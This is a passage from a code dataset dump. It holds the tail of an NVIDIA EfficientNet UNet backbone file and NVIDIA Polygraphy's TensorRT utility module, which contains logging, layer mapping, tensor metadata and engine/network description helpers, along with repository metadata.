\"\"\"Function to construct model specific backbone.\"\"\"\r\n\r\n model_class = EfficientNetB0\r\n kwargs['add_head'] = False\r\n kwargs['input_tensor'] = args[1]\r\n kwargs['stride16'] = True\r\n while args:\r\n args.pop()\r\n\r\n model = model_class(*args, **kwargs)\r\n\r\n return model\r\n", "repo_name": "NVIDIA/tao_tensorflow1_backend", "sub_path": "nvidia_tao_tf1/cv/unet/model/efficientnet_unet.py", "file_name": "efficientnet_unet.py", "file_ext": "py", "file_size_in_byte": 4343, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "nvidia_tao_tf1.cv.unet.model.unet_model.UnetModel", "line_number": 32, "usage_type": "name"}, {"api_name": "nvidia_tao_tf1.cv.unet.model.layers.Conv2DTranspose_block", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 81, "usage_type": "attribute"}, {"api_name": "keras.models.Model", "line_number": 87, "usage_type": "call"}, {"api_name": "nvidia_tao_tf1.core.templates.efficientnet.EfficientNetB0", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "70315572647", "text": "import contextlib\nimport json\nimport os\nimport signal\n\nfrom polygraphy import config, mod, util\nfrom polygraphy.common import TensorMetadata\nfrom polygraphy.exception import PolygraphyException\nfrom polygraphy.logger import G_LOGGER, LogMode\n\ntrt = mod.lazy_import(\"tensorrt\")\nnp = mod.lazy_import(\"numpy\")\n\n\nTRT_LOGGER = None\n\n\n@mod.export()\ndef get_trt_logger():\n \"\"\"\n Get the global TensorRT logger created by Polygraphy.\n\n Returns:\n trt.Logger: The TensorRT logger.\n \"\"\"\n global TRT_LOGGER\n\n LoggerType = trt.Logger\n if mod.version(trt.__version__) >= mod.version(\"8.0\"):\n\n class CustomTrtLogger(trt.ILogger):\n def __init__(self):\n trt.ILogger.__init__(self)\n\n def log(self, severity, msg):\n try:\n log_func = {\n # This function cannot throw, so `critical` should not be used here!\n trt.Logger.INTERNAL_ERROR: G_LOGGER.error,\n trt.Logger.ERROR: G_LOGGER.error,\n # Reduce warning spam from TRT.\n trt.Logger.WARNING: lambda msg: G_LOGGER.warning(msg, mode=LogMode.ONCE),\n trt.Logger.INFO: G_LOGGER.verbose,\n trt.Logger.VERBOSE: G_LOGGER.extra_verbose,\n }.get(severity, G_LOGGER.super_verbose)\n\n log_func(msg)\n except KeyboardInterrupt:\n # `log()` is `noexcept` so we need to convert exceptions to signals so that\n # ctrl-C will work as expected.\n os.kill(os.getpid(), signal.SIGTERM)\n\n LoggerType = CustomTrtLogger\n\n if TRT_LOGGER is None:\n TRT_LOGGER = LoggerType()\n return TRT_LOGGER\n\n\ndef _should_use_v3_api():\n return mod.version(trt.__version__) > mod.version(\"8.5.0.9\")\n\n\ndef fail_unavailable(what):\n G_LOGGER.backtrace()\n G_LOGGER.critical(f\"{what} is not available on TensorRT version {trt.__version__}.\")\n\n\ndef check_onnx_parser_errors(parser, success):\n if parser.num_errors > 0:\n for index in range(parser.num_errors):\n G_LOGGER.error(parser.get_error(index))\n G_LOGGER.critical(\"Could not parse ONNX correctly\")\n\n if not success:\n G_LOGGER.critical(\"Failed to parse ONNX model. Does the model file exist and contain a valid ONNX model?\")\n\n\ndef get_layer_class_mapping():\n layer_class_mapping = {}\n\n def try_add(layer_type, layer_cls):\n try:\n layer_type = getattr(trt.LayerType, layer_type)\n layer_cls = getattr(trt, layer_cls)\n except AttributeError:\n if config.INTERNAL_CORRECTNESS_CHECKS:\n G_LOGGER.warning(f\"Could not find layer type: {layer_type} or layer class: {layer_cls}\")\n else:\n layer_class_mapping[layer_type] = layer_cls\n\n try_add(\"CONVOLUTION\", \"IConvolutionLayer\")\n try_add(\"FULLY_CONNECTED\", \"IFullyConnectedLayer\")\n try_add(\"ACTIVATION\", \"IActivationLayer\")\n try_add(\"POOLING\", \"IPoolingLayer\")\n try_add(\"LRN\", \"ILRNLayer\")\n try_add(\"SCALE\", \"IScaleLayer\")\n try_add(\"SOFTMAX\", \"ISoftMaxLayer\")\n try_add(\"DECONVOLUTION\", \"IDeconvolutionLayer\")\n try_add(\"CONCATENATION\", \"IConcatenationLayer\")\n try_add(\"ELEMENTWISE\", \"IElementWiseLayer\")\n try_add(\"PLUGIN\", \"IPluginLayer\")\n try_add(\"UNARY\", \"IUnaryLayer\")\n try_add(\"PADDING\", \"IPaddingLayer\")\n try_add(\"SHUFFLE\", \"IShuffleLayer\")\n try_add(\"REDUCE\", \"IReduceLayer\")\n try_add(\"TOPK\", \"ITopKLayer\")\n try_add(\"GATHER\", \"IGatherLayer\")\n try_add(\"MATRIX_MULTIPLY\", \"IMatrixMultiplyLayer\")\n try_add(\"RAGGED_SOFTMAX\", \"IRaggedSoftMaxLayer\")\n try_add(\"CONSTANT\", \"IConstantLayer\")\n try_add(\"RNN\", \"IRNNLayer\")\n try_add(\"RNN_V2\", \"IRNNv2Layer\")\n try_add(\"IDENTITY\", \"IIdentityLayer\")\n try_add(\"PLUGIN_V2\", \"IPluginV2Layer\")\n try_add(\"SLICE\", \"ISliceLayer\")\n try_add(\"SHAPE\", \"IShapeLayer\")\n try_add(\"PARAMETRIC_RELU\", \"IParametricReLULayer\")\n try_add(\"RESIZE\", \"IResizeLayer\")\n try_add(\"TRIP_LIMIT\", \"ITripLimitLayer\")\n try_add(\"RECURRENCE\", \"IRecurrenceLayer\")\n try_add(\"ITERATOR\", \"IIteratorLayer\")\n try_add(\"LOOP_OUTPUT\", \"ILoopOutputLayer\")\n try_add(\"SELECT\", \"ISelectLayer\")\n try_add(\"FILL\", \"IFillLayer\")\n try_add(\"QUANTIZE\", \"IQuantizeLayer\")\n try_add(\"DEQUANTIZE\", \"IDequantizeLayer\")\n try_add(\"CONDITION\", \"IConditionLayer\")\n try_add(\"CONDITIONAL_INPUT\", \"IIfConditionalInputLayer\")\n try_add(\"CONDITIONAL_OUTPUT\", \"IIfConditionalOutputLayer\")\n try_add(\"ASSERTION\", \"IAssertionLayer\")\n try_add(\"SCATTER\", \"IScatterLayer\")\n try_add(\"EINSUM\", \"IEinsumLayer\")\n try_add(\"GRID_SAMPLE\", \"IGridSampleLayer\")\n try_add(\"ONE_HOT\", \"IOneHotLayer\")\n try_add(\"NON_ZERO\", \"INonZeroLayer\")\n try_add(\"NMS\", \"INMSLayer\")\n try_add(\"REVERSE_SEQUENCE\", \"IReverseSequenceLayer\")\n try_add(\"NORMALIZATION\", \"INormalizationLayer\")\n try_add(\"CAST\", \"ICastLayer\")\n\n return layer_class_mapping\n\ndef check_numpy_trt_compatibility():\n if mod.version(trt.__version__) < mod.version(\"8.6\") and \\\n mod.version(np.__version__) >= mod.version(\"1.24\"):\n # TensorRT < 8.6 uses a deprecated alias np.bool that was removed in NumPy >= 1.24\n G_LOGGER.warning(f\"TensorRT version {trt.__version__} and NumPy version {np.__version__} \"\n \"are not compatible. Consider downgrading your NumPy package to a version < 1.24 \"\n \"or upgrading TensorRT to a version >= 8.6.\", mode=LogMode.ONCE)\n\n\ndef np_dtype_from_trt(trt_dtype):\n # trt.nptype uses NumPy, so to make autoinstall work, we need to trigger it before that.\n mod.autoinstall(np)\n check_numpy_trt_compatibility()\n return np.dtype(trt.nptype(trt_dtype))\n\n\ndef get_network_input_names_meta(network):\n names = []\n meta = TensorMetadata()\n for i in range(network.num_inputs):\n tensor = network.get_input(i)\n names.append(tensor.name)\n meta.add(name=tensor.name, dtype=np_dtype_from_trt(tensor.dtype), shape=tensor.shape)\n return names, meta\n\n\ndef get_network_output_names_meta(network):\n names = []\n meta = TensorMetadata()\n for i in range(network.num_outputs):\n tensor = network.get_output(i)\n names.append(tensor.name)\n meta.add(name=tensor.name, dtype=np_dtype_from_trt(tensor.dtype), shape=tensor.shape)\n return names, meta\n\n\ndef get_layer_input_names_meta(layer):\n names = []\n meta = TensorMetadata()\n for i in range(layer.num_inputs):\n inp = layer.get_input(i)\n if inp:\n names.append(inp.name)\n meta.add(inp.name, np_dtype_from_trt(inp.dtype), inp.shape)\n return names, meta\n\n\ndef get_layer_output_names_meta(layer):\n names = []\n meta = TensorMetadata()\n for i in range(layer.num_outputs):\n out = layer.get_output(i)\n if out:\n names.append(out.name)\n meta.add(out.name, np_dtype_from_trt(out.dtype), out.shape)\n return names, meta\n\n\ndef str_from_layer(layer, index):\n input_names, input_meta = get_layer_input_names_meta(layer)\n output_names, output_meta = get_layer_output_names_meta(layer)\n return util.str_from_layer(\n \"Layer\", index, layer.name, layer.type, input_names, input_meta, output_names, output_meta\n )\n\n\ndef get_layer_attribute_names(layer):\n def is_special_attribute(attr):\n return attr.startswith(\"__\") and attr.endswith(\"__\")\n\n def is_valid_attribute(attr, layer):\n if (\n type(layer) == trt.IPoolingLayer\n or type(layer) == trt.IConvolutionLayer\n or type(layer) == trt.IDeconvolutionLayer\n ):\n if len(layer.get_input(0).shape) > 4:\n # 3D pooling uses padding_nd\n return attr not in [\"padding\", \"stride\", \"window_size\"]\n if type(layer) == trt.IResizeLayer:\n if layer.num_inputs > 1:\n return attr not in [\"scales\"]\n if type(layer) == trt.ISliceLayer:\n if layer.num_inputs > 1:\n return attr not in [\"shape\", \"start\", \"stride\"]\n return True\n\n return [\n attr\n for attr in dir(layer)\n if not is_special_attribute(attr) and not hasattr(trt.ILayer, attr) and is_valid_attribute(attr, layer)\n ]\n\n\ndef str_from_network(network, show_layers=None, show_attrs=None, show_weights=None):\n \"\"\"\n Converts a TensorRT network to a human-readable representation\n\n Args:\n network (trt.INetworkDefinition): The network.\n show_layers (bool): Whether to display per-layer information.\n show_attrs (bool): Whether to display per-layer attributes.\n show_weights (bool): Whether to display the value of weights.\n\n Returns:\n str\n \"\"\"\n show_layers = util.default(show_layers, False)\n show_attrs = util.default(show_attrs, False)\n show_weights = util.default(show_weights, False)\n\n LAYER_TYPE_CLASS_MAPPING = get_layer_class_mapping()\n\n network_str = f\"Name: {network.name} | {'Implicit' if hasattr(network, 'has_implicit_batch_dimension') and network.has_implicit_batch_dimension else 'Explicit'} Batch Network{' with Explicit Precision ' if hasattr(network, 'has_explicit_precision') and network.has_explicit_precision else ''}\\n\"\n network_str += \"\\n\"\n\n _, input_metadata = get_network_input_names_meta(network)\n network_str += f\"---- {len(input_metadata)} Network Input(s) ----\\n{input_metadata}\\n\\n\"\n _, output_metadata = get_network_output_names_meta(network)\n network_str += f\"---- {len(output_metadata)} Network Output(s) ----\\n{output_metadata}\\n\\n\"\n network_str += f\"---- {network.num_layers} Layer(s) ----\\n\"\n if show_layers:\n for index, layer in enumerate(network):\n if layer.type in LAYER_TYPE_CLASS_MAPPING:\n layer.__class__ = LAYER_TYPE_CLASS_MAPPING[layer.type]\n\n network_str += str_from_layer(layer, index)\n\n if show_attrs:\n # Exclude special attributes, as well as any attributes of the base layer class (those can be displayed above).\n attrs = get_layer_attribute_names(layer)\n if attrs:\n network_str += util.indent_block(\"---- Attributes ----\") + \"\\n\"\n for attr in attrs:\n with G_LOGGER.verbosity():\n val = getattr(layer, attr)\n if show_weights or not isinstance(val, np.ndarray):\n attr_str = \"\"\n if layer.name:\n attr_str += f\"{layer.name}.\"\n network_str += util.indent_block(f\"{attr_str}{attr} = {val}\") + \"\\n\"\n network_str += \"\\n\"\n\n return util.indent_block(network_str, level=0)\n\n\ndef get_all_tensors(network):\n all_tensors = set()\n for layer in network:\n for i in range(layer.num_inputs):\n all_tensors.add(layer.get_input(i))\n for i in range(layer.num_outputs):\n all_tensors.add(layer.get_output(i))\n # Optional tensors that are omitted are reported as `None`s, so we need to exclude them.\n return {t.name: t for t in all_tensors if t is not None}\n\n\ndef mark_outputs(network, outputs):\n \"\"\"\n Mark the specified outputs as network outputs.\n\n Args:\n network (trt.INetworkDefinition): The network in which to mark outputs.\n outputs (Sequence[str]): The names of tensors to mark as outputs.\n \"\"\"\n outputs = util.unique_list(outputs)\n\n tensor_map = get_all_tensors(network)\n util.check_sequence_contains(\n tensor_map.keys(), outputs, name=\"the network\", items_name=\"outputs\", check_extra=False\n )\n\n for tensor in tensor_map.values():\n # Clear all old outputs\n if tensor.is_network_output:\n network.unmark_output(tensor)\n\n for name in outputs:\n G_LOGGER.ultra_verbose(f\"Marking {name} as an output\")\n network.mark_output(tensor_map[name])\n\n\ndef mark_layerwise(network):\n # Layers within loops cannot be marked as network outputs.\n LOOP_START_NAMES = [\"TRIP_LIMIT\", \"ITERATOR\", \"RECURRENCE\"]\n LOOP_END_NAMES = [\"LOOP_OUTPUT\"]\n LOOP_START_LAYERS = [getattr(trt.LayerType, attr) for attr in LOOP_START_NAMES if hasattr(trt.LayerType, attr)]\n LOOP_END_LAYERS = [getattr(trt.LayerType, attr) for attr in LOOP_END_NAMES if hasattr(trt.LayerType, attr)]\n EXCLUDE_LAYERS = [trt.LayerType.SHAPE, trt.LayerType.CONSTANT]\n outputs = []\n in_loop = False\n for layer in network:\n if layer.type in LOOP_START_LAYERS:\n G_LOGGER.warning(\n \"Loop detected. Please ensure the network is topologically sorted so that layers within \"\n \"the loop body are not marked as network outputs in layerwise mode\",\n mode=LogMode.ONCE,\n )\n in_loop = True\n elif layer.type in LOOP_END_LAYERS:\n in_loop = False\n\n should_mark_layer = not in_loop and layer.type not in EXCLUDE_LAYERS\n if should_mark_layer:\n for index in range(layer.num_outputs):\n tensor = layer.get_output(index)\n if tensor is not None:\n outputs.append(tensor.name)\n\n G_LOGGER.verbose(f\"Marking {len(outputs)} tensors as outputs\")\n mark_outputs(network, outputs)\n\n\ndef unmark_outputs(network, outputs):\n outputs = util.unique_list(outputs)\n\n tensor_map = get_all_tensors(network)\n util.check_sequence_contains(\n tensor_map.keys(), outputs, name=\"the network\", items_name=\"outputs\", check_extra=False\n )\n\n for name in outputs:\n tensor = tensor_map[name]\n if tensor.is_network_output:\n network.unmark_output(tensor)\n\n\ndef str_from_config(config):\n # Check the default device type so that we can trigger this from the tests.\n # On non-DLA platforms, config.DLA_core can never be set to anything other than -1,\n # but default_device_type can be set to DLA..\n using_dla = config.DLA_core >= 0 or config.default_device_type == trt.DeviceType.DLA\n\n lines = []\n\n def str_from_list(lst):\n return \"[\" + \", \".join(lst) + \"]\"\n\n def add_line(title, line):\n lines.append((f\"{title:{22}} | \" + line).strip())\n\n def get_enabled_enum_vals(EnumType, is_enabled):\n # is_enabled is a Callable[[enum_val], bool] which reports whether to include the enum value.\n return [name for name, enum_val in EnumType.__members__.items() if is_enabled(enum_val)]\n\n # Flags\n enabled_builder_flags = get_enabled_enum_vals(trt.BuilderFlag, lambda flag: config.get_flag(flag))\n add_line(\"Flags\", f\"{str_from_list(enabled_builder_flags)}\")\n\n # Engine Capability\n with contextlib.suppress(AttributeError):\n add_line(\"Engine Capability\", str(config.engine_capability))\n\n # Memory Pools\n with contextlib.suppress(AttributeError):\n mem_pool_limits = [\n f\"{name}: {config.get_memory_pool_limit(pool_type) / float(1<<20):.2f} MiB\"\n for name, pool_type in trt.MemoryPoolType.__members__.items()\n # Only show DLA memory pools when DLA is in use\n if (not name.startswith(\"DLA\") or using_dla)\n ]\n add_line(\"Memory Pools\", f\"{str_from_list(mem_pool_limits)}\")\n\n # Tactic Sources\n with contextlib.suppress(AttributeError):\n source_vals = get_enabled_enum_vals(trt.TacticSource, lambda val: (1 << int(val)) & config.get_tactic_sources())\n add_line(\"Tactic Sources\", f\"{str_from_list(source_vals)}\")\n\n # DLA\n if using_dla:\n add_line(\"DLA\", f\"Default Device Type: {config.default_device_type}, Core: {config.DLA_core}\")\n\n # Profiling Verbosity\n with contextlib.suppress(AttributeError):\n add_line(\"Profiling Verbosity\", f\"{config.profiling_verbosity}\")\n\n # Optimization Profiles\n if config.num_optimization_profiles > 1: # Not particularly interesting unless there are multiple.\n add_line(\"Optimization Profiles\", f\"{config.num_optimization_profiles} profile(s)\")\n\n # Preview Features\n with contextlib.suppress(AttributeError):\n feature_vals = get_enabled_enum_vals(trt.PreviewFeature, lambda val: config.get_preview_feature(val))\n if feature_vals:\n add_line(\"Preview Features\", f\"{str_from_list(feature_vals)}\")\n\n # Calibrator\n if config.int8_calibrator:\n add_line(\"Calibrator\", f\"{config.int8_calibrator}\")\n\n return \"\\n\".join(lines)\n\n\ndef check_profile(profile):\n if not bool(profile):\n G_LOGGER.critical(f\"Profile is not valid, please provide profile data.\\nNote: profile was: {profile}\")\n return profile\n\n\ndef str_from_tensor(tensor, is_shape_tensor):\n ret = \"Input \"\n if is_shape_tensor:\n ret += \"shape-tensor\"\n else:\n ret += \"tensor\"\n ret += f\": {tensor.name} (dtype={tensor.dtype}, shape={tensor.shape})\"\n return ret\n\n\n# Note: When `force_opt_shapes=True` this method is treated as being specific to calibration.\ndef get_input_metadata_from_network(network, profile, force_opt_shapes=None):\n \"\"\"\n Returns metadata about the inputs of a network, referring to the values\n set in a profile for dynamic shapes.\n\n Args:\n network (trt.INetworkDefinition):\n The network the profile applies to.\n profile (trt.IOptimizationProfile):\n The profile from which to retrieve input metadata.\n\n force_opt_shapes (bool):\n Whether to ignore the minimum and maximum shapes in the profile\n and always use OPT shapes.\n Defaults to False.\n\n Returns:\n TensorMetadata:\n A mapping of input names to their types and shapes.\n Shapes are retrieved from the OPT values in the profile.\n\n Raises:\n PolygraphyException:\n If the network has dynamic shapes or shape tensor inputs but no profile\n was provided.\n \"\"\"\n force_opt_shapes = util.default(force_opt_shapes, False)\n\n input_metadata = TensorMetadata()\n for index in range(network.num_inputs):\n tensor = network.get_input(index)\n # Only access the profile if we actually need to.\n # This way, this method works with static networks even without a profile set.\n min_shape = None\n max_shape = None\n opt_shape = tensor.shape\n if tensor.is_shape_tensor or util.is_shape_dynamic(tensor.shape):\n if tensor.is_shape_tensor:\n min_shape, opt_shape, max_shape = profile.get_shape_input(tensor.name)\n else:\n min_shape, opt_shape, max_shape = profile.get_shape(tensor.name)\n\n if force_opt_shapes and tuple(min_shape) != tuple(max_shape):\n G_LOGGER.warning(\n \"TensorRT does not currently support using dynamic shapes during calibration. \"\n \"The `OPT` shapes from the calibration profile will be used for tensors with dynamic shapes. \"\n \"Calibration data is expected to conform to those shapes. \",\n mode=LogMode.ONCE,\n )\n\n input_metadata.add(\n name=tensor.name,\n dtype=np_dtype_from_trt(tensor.dtype),\n shape=opt_shape if force_opt_shapes else tensor.shape,\n min_shape=None if force_opt_shapes else min_shape,\n max_shape=None if force_opt_shapes else max_shape,\n )\n return input_metadata\n\n\n# calib_profile parameter is used to bypass `get_calibration_profile()` to make this work on TRT 7.0 and older.\ndef try_setup_polygraphy_calibrator(config, network, calib_profile=None):\n \"\"\"\n Tries to call setup methods specific to Polygraphy calibrators.\n Returns early if there is no calibrator or if it is not a Polygraphy calibrator.\n \"\"\"\n calibrator = config.int8_calibrator\n if calibrator is None or not (\n hasattr(calibrator, \"is_polygraphy_calibrator\") and calibrator.is_polygraphy_calibrator\n ):\n # No calibrator or not a Polygraphy calibrator.\n return\n\n if calib_profile is None:\n try:\n calib_profile = config.get_calibration_profile()\n except AttributeError:\n G_LOGGER.extra_verbose(\"Cannot get calibration profile on TensorRT 7.0 and older.\")\n # Return early so we don't emit extraneous warnings on TRT 7.0 and older.\n return\n\n try:\n # TensorRT does not currently support shapes other than the OPT shape.\n input_metadata = get_input_metadata_from_network(network, calib_profile, force_opt_shapes=True)\n except PolygraphyException as err:\n G_LOGGER.warning(\n \"Could not determine input_metadata to provide to the calibrator because no calibration profile is set. \"\n \"Please either set a calibration profile in the config or call `calibrator.set_input_metadata()` manually. \"\n f\"\\nNote: Error was:\\n{err}\",\n mode=LogMode.ONCE,\n )\n else:\n calibrator.set_input_metadata(input_metadata)\n\n\ndef get_hwc_shape_from_chw(shape, strides):\n # The relative size (descending sorted order) of the strides should give the permutation to convert the shape\n perm = sorted(range(len(strides)), key=strides.__getitem__, reverse=True)\n return tuple([shape[i] for i in perm])\n\n\ndef get_chw_shape_from_hwc(shape, strides):\n perm = sorted(range(len(strides)), key=strides.__getitem__, reverse=True)\n inv_perm = sorted(range(len(perm)), key=perm.__getitem__)\n return tuple([shape[i] for i in inv_perm])\n\n\ndef get_metadata_from_engine(engine, context, mode):\n meta = TensorMetadata()\n for idx in range(engine.num_io_tensors):\n name = engine.get_tensor_name(idx)\n if engine.get_tensor_mode(name) != mode:\n continue\n\n shape = engine.get_tensor_shape(name)\n # If the input format is HWC, make sure the input is shaped accordingly\n if engine.get_tensor_format(name) == trt.TensorFormat.HWC:\n shape = get_hwc_shape_from_chw(shape, context.get_tensor_strides(name))\n\n meta.add(name=name, dtype=np_dtype_from_trt(engine.get_tensor_dtype(name)), shape=shape)\n return meta\n\n\ndef str_from_engine(engine, context, show_layers=None, show_attrs=None):\n show_layers = util.default(show_layers, False)\n show_attrs = util.default(show_attrs, False)\n\n if _should_use_v3_api():\n num_io_tensors = engine.num_io_tensors\n else:\n num_io_tensors = get_bindings_per_profile(engine)\n\n engine_str = f\"Name: {engine.name} | {'Refittable ' if engine.refittable else ''}{'Implicit' if hasattr(engine, 'has_implicit_batch_dimension') and engine.has_implicit_batch_dimension else 'Explicit'} Batch Engine\\n\"\n engine_str += \"\\n\"\n\n # Show metadata for the first profile (i.e. the dynamic shapes)\n if _should_use_v3_api():\n input_metadata = get_metadata_from_engine(engine, context, mode=trt.TensorIOMode.INPUT)\n output_metadata = get_metadata_from_engine(engine, context, mode=trt.TensorIOMode.OUTPUT)\n else:\n input_metadata = get_input_metadata_from_engine(engine, 0, num_io_tensors)\n output_metadata = get_output_metadata_from_engine(engine, 0, num_io_tensors)\n\n engine_str += f\"---- {len(input_metadata)} Engine Input(s) ----\\n{input_metadata}\\n\\n\"\n engine_str += f\"---- {len(output_metadata)} Engine Output(s) ----\\n{output_metadata}\\n\\n\"\n\n engine_str += f\"---- Memory ----\\nDevice Memory: {engine.device_memory_size} bytes\\n\\n\"\n\n engine_str += f\"---- {engine.num_optimization_profiles} Profile(s) ({num_io_tensors} Tensor(s) Each) ----\\n\"\n for profile_index in range(engine.num_optimization_profiles):\n engine_str += f\"- Profile: {profile_index}\\n\"\n\n if _should_use_v3_api():\n max_width = max([len(engine.get_tensor_name(idx)) for idx in range(engine.num_io_tensors)]) + 8\n else:\n max_width = max([len(binding) for binding in engine]) + 8\n\n for idx in range(num_io_tensors):\n if _should_use_v3_api():\n name = engine.get_tensor_name(idx)\n binding_type = \" (Input)\" if engine.get_tensor_mode(name) == trt.TensorIOMode.INPUT else \"(Output)\"\n engine_str += util.indent_block(f\"Tensor: {name:<{max_width}} {binding_type}, Index: {idx}\")\n\n if engine.get_tensor_mode(name) == trt.TensorIOMode.INPUT:\n min_shape, opt_shape, max_shape = engine.get_tensor_profile_shape(name, profile_index)\n engine_str += f\" | Shapes: min={min_shape}, opt={opt_shape}, max={max_shape}\\n\"\n else:\n engine_str += f\" | Shape: {engine.get_tensor_shape(name)}\\n\"\n else:\n binding = profile_index * num_io_tensors + idx\n name = f\"[Name: {engine.get_binding_name(binding)}]\"\n binding_type = \"(Input) \" if engine.binding_is_input(binding) else \"(Output)\"\n engine_str += util.indent_block(f\"Binding Index: {binding} {binding_type} {name:<{max_width}}\")\n\n if engine.binding_is_input(binding):\n if engine.is_shape_binding(binding):\n min_shape, opt_shape, max_shape = engine.get_profile_shape_input(profile_index, binding)\n else:\n min_shape, opt_shape, max_shape = engine.get_profile_shape(profile_index, binding)\n engine_str += f\" | Shapes: min={min_shape}, opt={opt_shape}, max={max_shape}\\n\"\n else:\n engine_str += f\" | Shape: {engine.get_binding_shape(binding)}\\n\"\n engine_str += \"\\n\"\n\n layers_per_profile = engine.num_layers // engine.num_optimization_profiles\n engine_str += (\n f\"---- {layers_per_profile} Layer(s){' Per Profile' if engine.num_optimization_profiles > 1 else ''} ----\\n\"\n )\n if show_layers:\n try:\n inspector = engine.create_engine_inspector()\n except AttributeError:\n G_LOGGER.warning(\n f\"Cannot show layer information because IEngineInspector is not available in this version of TensorRT ({trt.__version__})\"\n )\n else:\n for profile_idx in range(engine.num_optimization_profiles):\n indent_level = 0\n if engine.num_optimization_profiles >= 1:\n indent_level = 1\n engine_str += f\"- Profile: {profile_idx}\\n\"\n\n offset = profile_idx * layers_per_profile\n for index in range(layers_per_profile):\n layer_info = json.loads(\n inspector.get_layer_information(offset + index, trt.LayerInformationFormat.JSON)\n )\n\n op = \"Unknown\"\n input_names, input_meta = [], TensorMetadata()\n output_names, output_meta = [], TensorMetadata()\n origin = \"Unknown\"\n tactic = \"Unknown\"\n if engine.profiling_verbosity == trt.ProfilingVerbosity.DETAILED:\n name = layer_info.get(\"Name\", \"Unknown\")\n op = layer_info.get(\"LayerType\", \"Unknown\")\n\n def names_meta_from_inspector(key):\n names = []\n meta = TensorMetadata()\n info = layer_info.get(key)\n if info is None:\n return meta\n for elem in info:\n names.append(elem[\"Name\"])\n meta.add(name=elem[\"Name\"], dtype=None, shape=elem[\"Dimensions\"])\n return names, meta\n\n input_names, input_meta = names_meta_from_inspector(\"Inputs\")\n output_names, output_meta = names_meta_from_inspector(\"Outputs\")\n origin = layer_info.get(\"Origin\", \"Unknown\")\n tactic = layer_info.get(\"TacticValue\", \"Unknown\")\n else:\n G_LOGGER.warning(\n f\"This engine was created with a profiling verbosity of: {engine.profiling_verbosity}. Some layer information may be missing. Try setting a higher profiling verbosity to see more detailed layer information. \",\n mode=LogMode.ONCE,\n )\n name = layer_info\n\n engine_str += (\n util.indent_block(\n util.str_from_layer(\n \"Layer\", index, name, op, input_names, input_meta, output_names, output_meta\n ),\n indent_level,\n )\n + \"\\n\"\n )\n\n if show_attrs:\n engine_str += util.indent_block(\"---- Attributes ----\", indent_level + 1) + \"\\n\"\n engine_str += util.indent_block(f\"Origin = {origin}\", indent_level + 1) + \"\\n\"\n engine_str += util.indent_block(f\"Tactic = {tactic}\", indent_level + 1) + \"\\n\"\n\n engine_str += \"\\n\"\n\n return util.indent_block(engine_str, level=0)\n\n\n# V2 APIs\ndef add_binding_to_metadata(engine, binding, metadata, name_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n # name_binding always comes from profile 0, since that's where we\n # get all binding names in the runner\n metadata.add(\n name=engine[name_binding],\n dtype=np_dtype_from_trt(engine.get_binding_dtype(binding)),\n shape=list(engine.get_binding_shape(binding)),\n )\n\n\ndef get_input_metadata_from_engine(engine, start_binding, end_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n inputs = TensorMetadata()\n for index, binding in enumerate(range(start_binding, end_binding)):\n if engine.binding_is_input(binding):\n add_binding_to_metadata(engine, binding, inputs, name_binding=index)\n return inputs\n\n\ndef get_output_metadata_from_engine(engine, start_binding, end_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n outputs = TensorMetadata()\n for index, binding in enumerate(range(start_binding, end_binding)):\n if not engine.binding_is_input(binding):\n add_binding_to_metadata(engine, binding, outputs, name_binding=index)\n return outputs\n\n\ndef get_bindings_per_profile(engine):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n return engine.num_bindings // engine.num_optimization_profiles\n\n\ndef get_active_profile_bindings(context):\n \"\"\"\n Gets the start and end binding indices for the active optimization profile.\n\n Args:\n engine (trt.ICudaEngine): The engine in question.\n context (trt.IExecutionContext): The context where the profile is currently set.\n\n Returns:\n Tuple[int, int]: The start and end bindings indices, in that order\n \"\"\"\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n active_profile = context.active_optimization_profile\n if active_profile < 0:\n G_LOGGER.critical(\n f\"Cannot determine profile bindings since the optimization profile for this context is set to: {active_profile}\"\n )\n\n bindings_per_profile = get_bindings_per_profile(context.engine)\n\n start_binding = bindings_per_profile * active_profile\n end_binding = start_binding + bindings_per_profile\n\n G_LOGGER.ultra_verbose(\n f\"Total # of Profiles: {context.engine.num_optimization_profiles}, Bindings Per Profile: {bindings_per_profile}, \"\n f\"Active Profile: {active_profile}, Start Binding: {start_binding}, End Binding: {end_binding}\"\n )\n return start_binding, end_binding\n", "repo_name": "NVIDIA/TensorRT", "sub_path": "tools/Polygraphy/polygraphy/backend/trt/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 32219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8187, "dataset": "github-code", "pt": "53", "api": [{"api_name": "polygraphy.mod.lazy_import", "line_number": 11, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 11, "usage_type": "name"}, {"api_name": "polygraphy.mod.lazy_import", "line_number": 12, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 12, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 29, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 29, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 39, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 39, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 40, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 40, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 42, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 42, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 42, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbose", "line_number": 43, "usage_type": "attribute"}, {"api_name": 